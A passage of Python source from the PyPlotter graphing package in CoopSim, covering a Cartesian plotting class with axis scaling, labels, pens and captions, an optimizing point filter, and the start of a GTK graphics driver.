sy1 = self.sy1 + self.bottom - 1
else:
sy1 = self.sy1
return (self.sx1, sy1, self.sx1 + self.left - 1, sy2)
def rightFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the right frame.
"""
if self.overlap[0] > self.overlap[3]:
sy2 = self.sy2 - self.top
else:
sy2 = self.sy2
if self.overlap[1] > self.overlap[3]:
sy1 = self.sy1 + self.bottom - 1
else:
sy1 = self.sy1
return (self.sx2 - self.right + 1, sy1, self.sx2, sy2)
########################################################################
#
# class Cartesian
#
########################################################################
# Style Flags
AXISES, AXIS_DIVISION, FULL_GRID, LABELS, CAPTION, \
TITLE, SHUFFLE_DRAW, EVADE_DRAW, LOG_X, LOG_Y, \
KEEP_ASPECT, AUTO_ADJUST, AUTO_PEN = [2 ** i for i in range(13)]
DEFAULT_STYLE = TITLE | CAPTION | LABELS | FULL_GRID | AXISES | AUTO_ADJUST | AUTO_PEN
MASK_LAYOUT = LABELS | CAPTION | TITLE
MASK_GRAPHSTYLE = AXISES | AXIS_DIVISION | FULL_GRID | SHUFFLE_DRAW | EVADE_DRAW
MASK_RANGE_TYPE = KEEP_ASPECT | AUTO_ADJUST
MAGIC_TITLESIZE_FACTOR = 3
MAGIC_LABELSIZE_FACTOR = 3
MAGIC_CAPTIONLINE_FACTOR = 1.2
MAGIC_CAPTIONENTRY_EXTEND = 2
MAGIC_CAPTIONENTRY_DIV = 6
MAGIC_CAPTIONENTRY_HSPACE = 2
MAGIC_CAPTIONSIZE_ADD = 1 # lines
LOG_BASE = 10
class AutoPen(Gfx.Pen):
def __init__(self):
Gfx.Pen.__init__(self)
self.lineWidth = Gfx.MEDIUM
class DontDrawPen(Gfx.Pen):
def __init__(self):
Gfx.Pen.__init__(self)
self.color = (1.0, 1.0, 1.0)
AUTO_GENERATE_PEN = AutoPen()
DONT_DRAW_PEN = DontDrawPen()
CAPTION_PEN = Gfx.Pen(color=Gfx.BLACK, fsize=Gfx.SMALL)
class AutoGfx(Gfx.nilDriver):
pass
AUTO_GFX = AutoGfx()
def bitsum(i):
    """-> number of set bits (cross sum of the bits) of integer i"""
    # the original added the bit *values* (returning i itself); count them instead
    s = 0
    while i > 0:
        s += i & 1
        i >>= 1
    return s
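# Editorial note: e.g. bitsum(6) == 2 (two bits set), bitsum(8) == 1; the
# OptimizingFilter below uses this to check that exactly one of OPT_X/OPT_Y
# is given.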
class Cartesian(HardFramedScreen):
"""Plots function values onto a coordinate plane.
Attributs (read only!):
x1,y1,x2,y2 - floats: coordinate Range
xaxis, yaxis- strings: axis descriptions
styleFlags - integer, interpreted as a bitfield of flags;
defines style of the graph. Possible flags:
        AXISES, AXIS_DIVISION, FULL_GRID: draw axes,
        axis divisions and/or a full grid,
        LABELS, CAPTION, TITLE: draw axis labels, a
        caption with descriptions (generated from the pen
        names) below the graph, a title above the graph.
SHUFFLE_DRAW, EVADE_DRAW: two different algorithms to
allow for the visibility of overlapping graphs
LOG_X, LOG_Y: use a logarithmic scale for the x or y
axis respectively.
KEEP_ASPECT: Keep the aspect ratio of the coordinates
AUTO_ADJUST: automatically adjust the range of the graph
when a point is added that falls outside the current
range.
    stretchX, stretchY - stretch factors for logarithmic scales
axisPen, labelPen, titlePen, captionPen, backgroundPen - pens
(sets of graphical attributes) for the respective elements
of the graph
pens - dictionary (indexed by name strings) of pens (see
mod. Pens) for graphs to be drawn onto the coordinate plane
values - dictionary (indexed by name strings) of lists of
value pairs (x,y) that define the graph associated with the
respective pen (identified by its name)
penOrder - list of pen names in drawing order
colorIndex - color index that points to the color to be fetched
next from Colors.color, when generating the color for an
AutoPen.
"""
def __init__(self, gfx, x1, y1, x2, y2,
title="Graph", xaxis="X", yaxis="Y",
styleFlags=DEFAULT_STYLE,
axisPen=Gfx.BLACK_PEN, labelPen=Gfx.BLACK_PEN,
titlePen=Gfx.BLACK_PEN, captionPen=Gfx.BLACK_PEN,
backgroundPen=Gfx.WHITE_PEN,
region=REGION_FULLSCREEN):
"""Initializes the graph using the graphics driver 'gfx'.
For the other parameters see doc string of class Cartesian.
"""
if isinstance(gfx, AutoGfx):
gfx = GetDriver().Window(title=title)
self.x1, self.x2 = x1, x2
self.y1, self.y2 = y1, y2
self.titleStr = title
self.xaxis, self.yaxis = xaxis, yaxis
self.styleFlags = styleFlags
self.axisPen, self.labelPen = axisPen, labelPen
self.titlePen, self.captionPen = titlePen, captionPen
self.backgroundPen = backgroundPen
self.pens = {}
self.values = {}
self.penOrder = []
        self.colorIndex = 2  # set to 2, if you want to skip that yellow pen!
self.dpi = gfx.getResolution()
self.top, self.bottom, self.left, self.right = 0, 0, 0, 0
self.gfx = gfx
self.region = region
self._assertRangeParameters()
self._calcStretchFactors()
top, bottom, left, right = self._xcalcFrame()
HardFramedScreen.__init__(self, gfx, self.x1, self.y1,
self.x2, self.y2, region,
top, bottom, left, right,
styleFlags & KEEP_ASPECT)
self.redraw()
def _maxCaptionEntrySize(self):
"""-> (w, h, th) Size of the biggest Caption Entry."""
sl = [self.gfx.getTextSize(name) for name in self.pens.keys()]
if sl == []:
sl.append(self.gfx.getTextSize("ABDFGabdfg"))
wl = [s[0] for s in sl]
hl = [s[1] for s in sl]
th = max(hl)
w = max(wl)
w += int(MAGIC_CAPTIONENTRY_EXTEND * th + 0.5)
w += MAGIC_CAPTIONENTRY_HSPACE * th
h = int(th * MAGIC_CAPTIONLINE_FACTOR + 0.5)
self._captionESTuple = (w, h, th)
return self._captionESTuple
def _captionLinesNColumns(self):
"""-> (l,c) number of caption lines and columns."""
w, h, th = self._captionESTuple
scr = screenRegion(self.gfx, self.region)
sw = scr[2] - scr[0] + 1
c = max(1, min(len(self.pens), sw / w))
l = max(1, (len(self.pens) + c - 1) / c)
self._captionLCTuple = (l, c)
return self._captionLCTuple
def _xcalcFrame(self):
"""Returns the screen coordinates (top, bottom, left, right) of
the frame.
"""
if self.styleFlags & TITLE:
self.gfx.applyPen(self.titlePen, Gfx.FONT)
th = self.gfx.getTextSize("0g")[1]
top = int(th * MAGIC_TITLESIZE_FACTOR + 0.5)
else:
top = 0
if self.styleFlags & LABELS:
self.gfx.applyPen(self.labelPen, Gfx.FONT)
th = self.gfx.getTextSize("Og")[1]
self.labelSize = int(th * MAGIC_LABELSIZE_FACTOR + 0.5)
else:
self.labelSize = 0
left = self.labelSize
right = 0
if self.styleFlags & CAPTION:
self.gfx.applyPen(self.captionPen, Gfx.FONT)
w, h, th = self._maxCaptionEntrySize()
l, c = self._captionLinesNColumns()
bottom = l * h + th * MAGIC_CAPTIONSIZE_ADD + self.labelSize
sx1, sy1, sx2, sy2 = screenRegion(self.gfx, self.region)
if (bottom + top) > (sy2 - sy1) / 2:
bottom -= (bottom + top) - (sy2 - sy1) / 2
if bottom < 0:
bottom = 0
else:
bottom = self.labelSize
return top, bottom, left, right
def _calcFrame(self):
"""Determines the frame size. Returns True if frame size has
changed.
"""
top, bottom, left, right = self._xcalcFrame()
if top != self.top or bottom != self.bottom or \
left != self.left or right != self.right:
self.adjustFrame(top, bottom, left, right)
return True
else:
return False
def _calcStretchFactors(self):
"""Determines the stretch factors for logarithmic scales."""
self.stretchX = math.log10(self.x2 - self.x1 + 1.0)
self.stretchY = math.log10(self.y2 - self.y1 + 1.0)
def _scaleX(self, x):
"""Maps the x coordinate onto the screen coordinate range."""
if LOG_X & self.styleFlags:
return self.tr.X(math.log10(x) *
(self.x2 - self.x1) / self.stretchX + self.x1)
else:
return self.tr.X(x)
def _scaleY(self, y):
"""Maps the x coordinate onto the screen coordinate range."""
if LOG_Y & self.styleFlags:
return self.tr.Y(math.log10(y) *
(self.y2 - self.y1) / self.stretchY + self.y1)
else:
return self.tr.Y(y)
def _invX(self, x):
if LOG_X & self.styleFlags:
r = self.tr.invX(x) - self.x1
r = r * self.stretchX / (self.x2 - self.x1)
return LOG_BASE ** r
else:
return self.tr.invX(x)
def _invY(self, y):
if LOG_Y & self.styleFlags:
r = self.tr.invY(y) - self.y1
r = r * self.stretchY / (self.y2 - self.y1)
return LOG_BASE ** r
else:
return self.tr.invY(y)
def _axisDivision(self, a, b):
"""Divides a coordinate axis between a and b in a suitable
manner."""
if b - a <= 1.0:
corr = -1.0
else:
corr = 0.0
steps = 10.0 ** int(math.log10((b - a) / 2.0) + corr)
m = round(a / steps) * steps
if m <= a:
m += steps
epsilon = abs(b - a) / 1000.0
l = []
while m < b - epsilon:
l.append(m)
m += steps
return l
def _logAxisDivision(self, a, b):
"""Divides a coordinate axis between a and b logarithmically.
"""
steps = int(math.log10(b - a + 1) + 0.01 / b)
l = []
for i in range(int(a + 0.9999), steps + 1):
l.append(LOG_BASE ** i)
return l
def _XaxisDivision(self):
"""Divides the x axis either linearly or logarithmically
according to the style flags."""
if LOG_X & self.styleFlags:
return self._logAxisDivision(self.x1, self.x2)
else:
return self._axisDivision(self.x1, self.x2)
def _YaxisDivision(self):
"""Divides the x axis either linearly or logarithmically
according to the style flags."""
if LOG_Y & self.styleFlags:
return self._logAxisDivision(self.y1, self.y2)
else:
return self._axisDivision(self.y1, self.y2)
def _clear(self, sx1, sy1, sx2, sy2):
self.gfx.applyPen(self.backgroundPen, Gfx.MASK_FILL)
self.gfx.fillRect(sx1, sy1, sx2 - sx1 + 1, sy2 - sy1 + 1)
def _clearTitle(self):
x1, y1, x2, y2 = self.topFrame()
y1 += 2 # a little bit of tweaking
self._clear(x1, y1, x2, y2)
def _clearGraph(self):
sx1 = self.tr.X(self.x1)
sy1 = self.tr.Y(self.y1)
sx2 = self.tr.X(self.x2)
sy2 = self.tr.Y(self.y2)
self._clear(sx1, sy1, sx2, sy2 + 1) # "+1" is a tweak !
def _clearFullGraph(self):
sx1, sy1, sx2, sy2 = self.innerFrame()
sx1 -= self.labelSize
sy1 -= self.labelSize
self._clear(sx1, sy1, sx2, sy2 + 1) # "+1" is a tweak !
def _clearLabels(self):
sx1 = self.tr.X(self.x1) - 1
sy1 = self.tr.Y(self.y1) - 1
sx2 = self.tr.X(self.x2) + 1
sy2 = self.tr.Y(self.y2) + 1
self.gfx.applyPen(self.backgroundPen, Gfx.MASK_FILL)
self.gfx.fillRect(sx1 - self.labelSize, sy1 + 1, self.labelSize,
sy2 - sy1)
self.gfx.fillRect(sx1 + 1, sy1 - self.labelSize, sx2 - sx1,
self.labelSize)
def _clearCaption(self):
sx1, sy1, sx2, sy2 = self.bottomFrame()
sy2 -= self.labelSize
self._clear(sx1, sy1, sx2, sy2)
def _drawGrid(self):
"""Draws the axises of the coordinate system.
"""
if self.styleFlags & AXISES:
sx1 = self.tr.X(self.x1)
sy1 = self.tr.Y(self.y1)
sx2 = self.tr.X(self.x2)
sy2 = self.tr.Y(self.y2)
if self.y1 <= 0.0:
y = self._scaleY(0.0)
else:
y = self._scaleY(self.y1)
self.gfx.applyPen(self.axisPen, Gfx.MASK_LINE)
self.gfx.drawLine(self.tr.X(self.x1), y, self.tr.X(self.x2), y)
if self.styleFlags & AXIS_DIVISION:
self.gfx.setLineWidth(Gfx.THIN)
sy1 = y - self.dpi / 40 - 1
sy2 = sy1 + self.dpi / 20 + 1
for x in self._XaxisDivision():
sx = self._scaleX(x)
self.gfx.drawLine(sx, sy1, sx, sy2)
self.gfx.setLineWidth(self.axisPen.lineWidth)
if self.x1 <= 0.0:
x = self._scaleX(0.0)
else:
x = self._scaleX(self.x1)
self.gfx.applyPen(self.axisPen, Gfx.MASK_LINE)
self.gfx.drawLine(x, self.tr.Y(self.y1), x, self.tr.Y(self.y2))
if self.styleFlags & AXIS_DIVISION:
self.gfx.setLineWidth(Gfx.THIN)
sx1 = x - self.dpi / 40 - 1
sx2 = sx1 + self.dpi / 20 + 1
for y in self._YaxisDivision():
sy = self._scaleY(y)
self.gfx.drawLine(sx1, sy, sx2, sy)
if self.styleFlags & FULL_GRID:
sx1 = self.tr.X(self.x1)
sy1 = self.tr.Y(self.y1)
sx2 = self.tr.X(self.x2)
sy2 = self.tr.Y(self.y2)
self.gfx.setColor(self.axisPen.color)
self.gfx.setLineWidth(Gfx.THIN)
self.gfx.setLinePattern(Gfx.DOTTED)
for x in self._XaxisDivision():
sx = self._scaleX(x)
self.gfx.drawLine(sx, sy1, sx, sy2)
for y in self._YaxisDivision():
sy = self._scaleY(y)
self.gfx.drawLine(sx1, sy, sx2, sy)
self.gfx.setLineWidth(self.axisPen.lineWidth)
self.gfx.setLinePattern(Gfx.CONTINUOUS)
self.gfx.drawRect(sx1, sy1, sx2 - sx1 + 1, sy2 - sy1 + 1)
def _drawLabels(self):
"""Writes the labels onto the graph.
"""
def fmtNum(f, df):
"""float -> string (nicely rounded and formatted)."""
if f != 0.0:
i = int(round(math.log10(abs(df)))) - 1
else:
i = 0
if i >= 0:
i = 0
else:
i = abs(i)
return ("%." + str(i) + "f") % (round(f, i))
self.gfx.applyPen(self.labelPen, Gfx.MASK_FONT)
sx1 = self.tr.X(self.x1) - 1
sy1 = self.tr.Y(self.y1) - 1
sx2 = self.tr.X(self.x2) + 1
sy2 = self.tr.Y(self.y2) + 1
w, h = self.gfx.getTextSize(self.xaxis)
x = sx1 + (sx2 - sx1 + 1) / 2 - w / 2
y = sy1 - self.labelSize + h / 4
self.gfx.writeStr(x, y, self.xaxis)
w, h = self.gfx.getTextSize("0")
y = sy1 - h * 5 / 4
lastX = -1000000
for x in self._XaxisDivision():
fstr = fmtNum(x, self.x2 - self.x1)
w, h = self.gfx.getTextSize(fstr)
sx = self._scaleX(x) - w / 2
if sx + w > self.tr.sx2:
sx = self.tr.sx2 - w
if sx > lastX + h / 2:
self.gfx.writeStr(sx, y, fstr)
lastX = sx + w
w, h = self.gfx.getTextSize(self.yaxis)
x = sx1 - h * 6 / 4
if len(self.yaxis) >= 2:
y = sy2 - (sy2 - sy1 + 1) / 2 - w / 2
self.gfx.writeStr(x, y, self.yaxis, 90.0)
else:
y = sy2 - (sy2 - sy1 + 1) / 2 - h / 2
self.gfx.writeStr(x - w, y, self.yaxis)
w, h = self.gfx.getTextSize("0")
x = sx1 - h / 4
lastY = -1000000
for y in self._YaxisDivision():
fstr = fmtNum(y, self.y2 - self.y1)
w, h = self.gfx.getTextSize(fstr)
sy = self._scaleY(y) - w / 2
if sy + w > self.tr.sy2:
sy = self.tr.sy2 - w
if sy > lastY + h / 2:
self.gfx.writeStr(x, sy, fstr, 90.0)
lastY = sy + w
def _shuffleDraw(self):
"""Draws the recorded data on the cartesian plane. The order in
which the graphs are drawn is continuously changed, so that
overlapped graphs may still become visible. This results in
Zebra speckled graphs for overlapping curves.
"""
lengthDict = {}
for name, l in self.values.items():
lengthDict[name] = len(l)
n = max(list(lengthDict.values()) + [0])
nameList = list(self.pens.keys())
for name in nameList:
if lengthDict[name] == 1:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
self.gfx.applyPen(pen, Gfx.MASK_LINE)
x, y = self.values[name][0]
if self._inside(x, y):
self.gfx.drawPoint(self._scaleX(x), self._scaleY(y))
for i in range(1, n):
for name in nameList:
if lengthDict[name] > i:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
self.gfx.applyPen(pen, Gfx.MASK_LINE)
x1, y1 = self.values[name][i - 1]
x2, y2 = self.values[name][i]
if self._inside(x1, y1) and self._inside(x2, y2):
self.gfx.x_drawLine(self._scaleX(x1),
self._scaleY(y1),
self._scaleX(x2),
self._scaleY(y2))
random.shuffle(nameList)
def _evadeDraw(self):
"""Draws the recorded data onto the cartesian plane. If
        different graphs are overlapping they will be drawn next to
each other instead of on top of each other, so that overlapped
graphs may still become visible. This may lead to somewhat
inexact graphs as well as strange artifacts (zigzagged graphs)
in some cases.
"""
pSet = set()
names = list(self.pens.keys())
names.sort()
for name in names:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
if pen.lineWidth == Gfx.THICK:
delta = 3
elif pen.lineWidth == Gfx.MEDIUM:
delta = 2
else:
delta = 1
self.gfx.applyPen(pen, Gfx.MASK_LINE)
poly = []
for x, y in self.values[name]:
if self._inside(x, y):
point = (self._scaleX(x), self._scaleY(y))
while point in pSet:
point = (point[0], point[1] + delta)
pSet.add(point)
poly.append(point)
else:
self.gfx.x_drawPoly(poly)
poly = []
self.gfx.x_drawPoly(poly)
def _drawData(self):
"""Draws the recorded data onto the cartesian plane.
"""
if self.styleFlags & SHUFFLE_DRAW:
self._shuffleDraw()
elif self.styleFlags & EVADE_DRAW:
self._evadeDraw()
else:
for name in self.penOrder:
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
continue
self.gfx.applyPen(pen, Gfx.MASK_LINE)
poly = []
for x, y in self.values[name]:
if self._inside(x, y):
poly.append((self._scaleX(x), self._scaleY(y)))
else:
self.gfx.x_drawPoly(poly)
poly = []
self.gfx.x_drawPoly(poly)
def _drawTitle(self):
"""Writes the title of the graph.
"""
sx1, sy1, sx2, sy2 = self.topFrame()
self.gfx.applyPen(self.titlePen, Gfx.MASK_FONT)
w, h = self.gfx.getTextSize(self.titleStr)
x = sx1 + (sx2 - sx1 + 1 - w) / 2
y = sy1 + (sy2 - sy1 + 1 - h) / 2
self.gfx.writeStr(x, y, self.titleStr)
def _drawCaption(self):
"""Writes a description of all pens below the graph.
"""
if self.pens == {}:
return
sx1, sy1, sx2, sy2 = self.bottomFrame()
lines, columns = self._captionLCTuple
w, h, th = self._captionESTuple
y = sy2 - self.labelSize - th * MAGIC_CAPTIONSIZE_ADD / 2 + th / 3
        dw = MAGIC_CAPTIONENTRY_EXTEND * th / MAGIC_CAPTIONENTRY_DIV
lw = MAGIC_CAPTIONENTRY_EXTEND * th - 2 * dw
penNames = list(self.pens.keys())
penNames.sort()
i = 0
for name in penNames:
if i == 0:
x = sx1 + ((sx2 - sx1 + 1) - w * columns) / 2
#x = sx2 - w * columns
y -= h
i = columns
self.gfx.applyPen(self.pens[name], Gfx.MASK_LINE)
self.gfx.drawLine(x + dw, y + th / 2, x + lw, y + th / 2)
self.gfx.applyPen(self.captionPen, Gfx.MASK_FONT)
self.gfx.writeStr(x + lw + 2 * dw, y, name)
x += w
i -= 1
def _redrawFullGraph(self):
self._clearFullGraph()
self._drawGrid()
self._drawLabels()
self._drawData()
def _inside(self, x, y):
"""Returns True if point (x,y) is inside the graph."""
return (x >= self.x1) and (x <= self.x2) and \
(y >= self.y1) and (y <= self.y2)
def _adjustRangeToPoint(self, x, y):
"""Adjusts the graph range so that point x, y will fall inside
the range.
"""
x1, y1, x2, y2 = self.x1, self.y1, self.x2, self.y2
if x < x1:
x1 = x - abs(x2 - x) * 0.15
elif x > x2:
x2 = x + abs(x - x1) * 0.15
if y < y1:
y1 = y - abs(y2 - y) * 0.15
elif y > y2:
y2 = y + abs(y - y1) * 0.15
self.adjustRange(x1, y1, x2, y2)
def _assertRangeParameters(self):
assert self.x2 > self.x1, "x2 must be greater than x1!"
assert self.y2 > self.y1, "y2 must be greater than y1!"
assert not LOG_X & self.styleFlags or self.x1 >= 1, \
"x1 must be greater or equal 1 when using a logarithmic scale!"
assert not LOG_Y & self.styleFlags or self.y1 >= 1, \
"y1 must be greater or equal 1 when using a logarithmic scale!"
def adjustRange(self, x1, y1, x2, y2):
"""Adjusts the range of the coordinate plane."""
self._assertRangeParameters()
self.x1, self.x2 = x1, x2
self.y1, self.y2 = y1, y2
self._calcStretchFactors()
HardFramedScreen.adjustRange(self, x1, y1, x2, y2)
self._redrawFullGraph()
def setStyle(self, styleFlags=None, axisPen=None, labelPen=None,
titlePen=None, captionPen=None, backgroundPen=None,
redraw=True):
"""Changes the style of the graph. A parameter value of None
means that this parameter shall not be changed.
"""
RD_TITLE, RD_LABELS, RD_CAPTION, RD_GRAPH = [2 ** i for i in range(4)]
RD_NONE = 0
RD_ALL = RD_TITLE | RD_LABELS | RD_CAPTION | RD_GRAPH
redrawFlags = RD_NONE
updateGeometry = False
oldStyleFlags = self.styleFlags
if styleFlags != None:
if (MASK_LAYOUT & styleFlags) != (MASK_LAYOUT & self.styleFlags):
self._assertRangeParameters()
updateGeometry = True
redrawFlags |= RD_ALL
elif (MASK_GRAPHSTYLE & styleFlags) != \
(MASK_GRAPHSTYLE & self.styleFlags):
redrawFlags |= RD_GRAPH
elif ((LOG_X | LOG_Y) & styleFlags) != \
((LOG_X | LOG_Y) & self.styleFlags):
redrawFlags |= RD_LABELS | RD_GRAPH
self.styleFlags = styleFlags
else:
styleFlags = 0
if axisPen != None:
self.axisPen = axisPen
redrawFlags |= RD_GRAPH
if labelPen != None:
self.labelPen = labelPen
redrawFlags |= RD_LABELS
if titlePen != None:
self.titlePen = titlePen
redrawFlags |= RD_TITLE
if backgroundPen != None:
self.backgroundPen = backgroundPen
redrawFlags |= RD_ALL
if captionPen != None:
if self.captionPen.fontSize != captionPen.fontSize:
redrawFlags |= RD_ALL
updateGeometry = True
else:
redrawFlags |= RD_CAPTION
self.captionPen = captionPen
if oldStyleFlags & AUTO_ADJUST and \
not self.styleFlags & AUTO_ADJUST:
x1, y1, x2, y2 = self.x1, self.y1, self.x2, self.y2
for name in self.pens.keys():
for x, y in self.values[name]:
if x < x1:
x1 = x
elif x > x2:
x2 = x
if y < y1:
y1 = y
elif y > y2:
y2 = y
self.adjustRange(x1, y1, x2, y2) # implies redraw
redrawFlags &= ~RD_GRAPH
elif oldStyleFlags & KEEP_ASPECT and \
not self.styleFlags & KEEP_ASPECT:
redrawFlags |= RD_GRAPH
if updateGeometry:
self._calcFrame()
if redraw:
if redrawFlags == RD_ALL:
self.redraw()
else:
if redrawFlags & RD_TITLE:
self._clearTitle()
self._drawTitle()
if redrawFlags & RD_CAPTION:
self._clearCaption()
self._drawCaption()
if (redrawFlags & RD_LABELS) and (redrawFlags & RD_GRAPH):
self._redrawFullGraph()
else:
if redrawFlags & RD_LABELS:
self._clearLabels()
self._drawLabels()
elif redrawFlags & RD_GRAPH:
self._clearGraph()
self._drawGrid()
self._drawData()
def setTitle(self, title):
"""Changes the title of the graph."""
self.titleStr = title
self._clearTitle()
self._drawTitle()
def setLabels(self, xaxis=None, yaxis=None):
"""Changes the labeling of the graph."""
if xaxis != None:
self.xaxis = xaxis
if yaxis != None:
self.yaxis = yaxis
if self.styleFlags & LABELS:
self._clearLabels()
self._drawLabels()
def resizedGfx(self):
HardFramedScreen.resizedGfx(self)
self._calcFrame()
self.redraw()
def changeGfx(self, gfx):
self.dpi = gfx.getResolution()
return HardFramedScreen.changeGfx(self, gfx)
def dumpPostscript(self, fileName):
"""Saves the contents of the graph as postscript file."""
if fileName[-4:] == ".eps" and fileName[-3:] == ".ps":
fileName += ".ps"
driver = psGfx.Driver()
oldGfx = self.changeGfx(driver)
driver.save(fileName)
self.changeGfx(oldGfx)
def redrawGraph(self):
"""Redraws only the graph."""
self._clearGraph()
self._drawGrid()
self._drawData()
def redrawCaption(self):
"""Redraws the caption region."""
if self.styleFlags & CAPTION:
if self._calcFrame():
self._redrawFullGraph()
self._clearCaption()
self._drawCaption()
def redraw(self):
"""Redraws everything: the graph as well as the title and
the caption."""
self._clear(self.sx1, self.sy1, self.sx2, self.sy2)
self._drawGrid()
if self.styleFlags & LABELS:
self._drawLabels()
self._drawData()
if self.styleFlags & CAPTION:
self._drawCaption()
if self.styleFlags & TITLE:
self._drawTitle()
def reset(self, x1, y1, x2, y2):
"""Removes all pens and readjusts the range of the coordinate plane.
"""
self.pens = {}
self.values = {}
self.penOrder = []
self.adjustRange(x1, y1, x2, y2)
def addPen(self, name, pen=AUTO_GENERATE_PEN, updateCaption=True):
"""Adds a new pen."""
if isinstance(pen, AutoPen):
pen = copy.deepcopy(pen)
pen.color = Colors.colors[self.colorIndex]
self.colorIndex += 1
if self.colorIndex >= len(Colors.colors):
self.colorIndex = 0
self.penOrder.append(name)
self.pens[name] = pen
self.values[name] = []
if updateCaption:
self.redrawCaption()
def exchangePen(self, name, pen, redraw=True):
"""Changes the color and attributes of a pen."""
assert name in self.pens, "Cannot exchange pen '" +\
name + "' because it did not exist."
self.pens[name] = pen
if redraw:
self.redrawCaption()
if self.values[name]:
self.redrawGraph()
def removePen(self, name, redraw=True):
"""Removes a pen."""
del self.pens[name]
self.penOrder.remove(name)
flag = self.values[name] != []
del self.values[name]
if flag and redraw:
self.redrawGraph()
def addValue(self, name, x, y):
"""Adds another value to the value table of the pen named 'name'.
"""
# if not self._inside(x, y):
# if self.styleFlags & AUTO_ADJUST:
# self._adjustRangeToPoint(x, y)
# else: return
# self.values[name].append((x,y))
if name not in self.pens and AUTO_PEN & self.styleFlags:
self.addPen(name)
vl = self.values[name]
vl.append((x, y))
if not self._inside(x, y):
if self.styleFlags & AUTO_ADJUST:
self._adjustRangeToPoint(x, y)
else:
return
pen = self.pens[name]
if isinstance(pen, DontDrawPen):
return
self.gfx.applyPen(pen, Gfx.MASK_LINE)
if len(vl) > 1 and self._inside(vl[-2][0], vl[-2][1]):
x1, y1 = vl[-2]
self.gfx.x_drawLine(self._scaleX(x1), self._scaleY(y1),
self._scaleX(x), self._scaleY(y))
else:
self.gfx.drawPoint(self._scaleX(x), self._scaleY(y))
def peek(self, x, y):
"""screen coordinates -> coordinates on the graph."""
return (self._invX(x), self._invY(y))
def xaxisSteps(self, x1, x2):
"""-> List of virtual x-coordinates with one point for
each screen pixel."""
a = self._scaleX(x1)
b = self._scaleX(x2)
        # use b+2 instead of b+1 to avoid some strange range errors!
        # (the commented-out iterator versions below also use b+2)
        return list(map(self._invX, list(range(a, b + 2))))
def yaxisSteps(self, y1, y2):
"""-> List of virtual x-coordinates with one point for
each screen pixel."""
a = self._scaleY(y1)
b = self._scaleY(y2)
return list(map(self._invY, list(range(a, b + 1))))
# uncomment the following to break jython compatibility ;)
# def xaxisIter(self, x1, x2):
# """-> iterate over virtual x-coordinates with one point for
# each screen pixel."""
## a = self._scaleX(x1); b = self._scaleX(x2)
# for x in xrange(a, b+2): yield self._invX(x)
##
# def yaxisIter(self, y1, y2):
# """-> iterate over virtual x-coordinates with one point for
# each screen pixel."""
## a = self._scaleY(y1); b = self._scaleY(y2)
# for y in xrange(a, b+2): yield self._invY(y)
# saving the graph (not yet tested)!
# def reprGraph(self, withPens = False, lineFeeds = False):
# """Returns a string representation of the graph, including
# pen names, pens (optional) and value lists."""
# if lineFeeds:
## lf = "\n"; spc = " "
# else:
## lf = ""; spc = ""
## sl = ["[", lf]
# for name in self.penOrder:
## sl.extend(spc, "[", repr(name), ",", spc)
# if withPens:
## sl.extend(repr(self.pens[name]), ",", spc, lf)
## sl.extend(spc, spc, repr(self.values[name]), lf, spc, "]", lf)
## sl.extend("]", lf)
# return "".join(sl)
# def saveGraph(self, fName):
# """Saves the vectors of the graph to a file named 'fName'.
# Returns true, if successful."""
# try:
## f = file(fName, "w")
# except IOError:
# return False
# try:
# f.write(self.reprGraph())
# except IOError:
## ret = False
# else:
## ret = True
# f.close()
# return ret
########################################################################
#
# class OptimizingFilter
#
########################################################################
OPT_DONT, OPT_X, OPT_Y = [2 ** i for i in range(3)]
class OptimizingFilter(object):
"""Optimizes the the output on a graph on screen for speed
(at a possible cost of accuracy) by leaving out all those
points that have the same screen X- (or Y-) coordinate as the the
last added point.
The optimization is most usefull if the domain of the graph is
much larger than the screen resolution. Since only one the first
Y (resp. X) value is drawn for each X (resp Y) value the optimized
graph might actually look different than the full graph, although
this should not matter in most cases. Since points that are filtered
out are simply dropped and thus do not occur in the value list of
the graph object, it is not possible to regain accuracy by zooming
or resizing the window. Instead it will be necessary to recalculate
the graph. (This is the cost for the speed and memory benefits
gained by using the optimizing filter.)
Attributes:
graph - Graph object: the graph that is used for drawing
flags - int (bitset): the flags that determine the behaviour
of the optimizer: OPT_DONT turns of Optimization (this
allows switching between optimized and non optimized
output without putting another if clause into the drawing
loop). OPT_X and OPT_Y determine whether the x or the y
value is to be regared as the independend variable.
"""
def __init__(self, graph, flags=OPT_X):
        assert bitsum((OPT_X | OPT_Y) & flags) == 1, \
            "Orientation not given or ambiguous!"
self.graph = graph
self.flags = flags
self.graphChanged()
def graphChanged(self):
"""Takes notice of a readjusted or resized graph.
"""
if OPT_X & self.flags:
self.steps = self.graph.xaxisSteps(self.graph.x1,
self.graph.x2)
else:
self.steps = self.graph.yaxisSteps(self.graph.y1,
self.graph.y2)
self.index = {}
def addValue(self, name, x, y):
"""Adds a point to the graph only if the screen X (resp. Y)
coordinate differs from the last point.
"""
if OPT_X & self.flags:
pos = x
else:
pos = y
if not (OPT_DONT & self.flags):
try:
if pos >= self.steps[self.index.setdefault(name, 0)]:
self.index[name] += 1
self.graph.addValue(name, x, y)
except IndexError:
pass # index errors mean that pos is out of range anyway
else:
self.graph.addValue(name, x, y)
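# A minimal usage sketch (the Graph.Cartesian constructor signature is an
# assumption taken from the surrounding package, not verified here): wrap a
# graph in an OptimizingFilter so that a densely sampled curve draws at most
# one point per screen pixel column.
#
#   graph = Graph.Cartesian(gfx, 0.0, -1.0, 100.0, 1.0)
#   filtered = OptimizingFilter(graph, OPT_X)
#   for x in graph.xaxisSteps(0.0, 100.0):
#       filtered.addValue("sine", x, math.sin(x))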
########################################################################
#
# Tests
#
########################################################################
if __name__ == "__main__":
import systemTest
# systemTest.Test_Graph()
systemTest.Test_GraphLg()
```
#### File: CoopSim/PyPlotter/gtkGfx.py
```python
import math
import gtk, pango
from gtk import gdk
try:
import Gfx
except ImportError:
from . import Gfx
try:
    from Compatibility import *
except ImportError:
    from . import Compatibility
    globals().update(Compatibility.__dict__)
driverName = "gtkGfx"
########################################################################
#
# class Driver
#
########################################################################
stipple_Solid = gdk.bitmap_create_from_data(None,
"\xff\xff\xff\xff\xff\xff\xff\xff", 8, 8)
stipple_PatternA = gdk.bitmap_create_from_data(None,
"\xcc\x99\x33\x66\xcc\x99\x33\x66", 8, 8)
stipple_PatternB = gdk.bitmap_create_from_data(None,
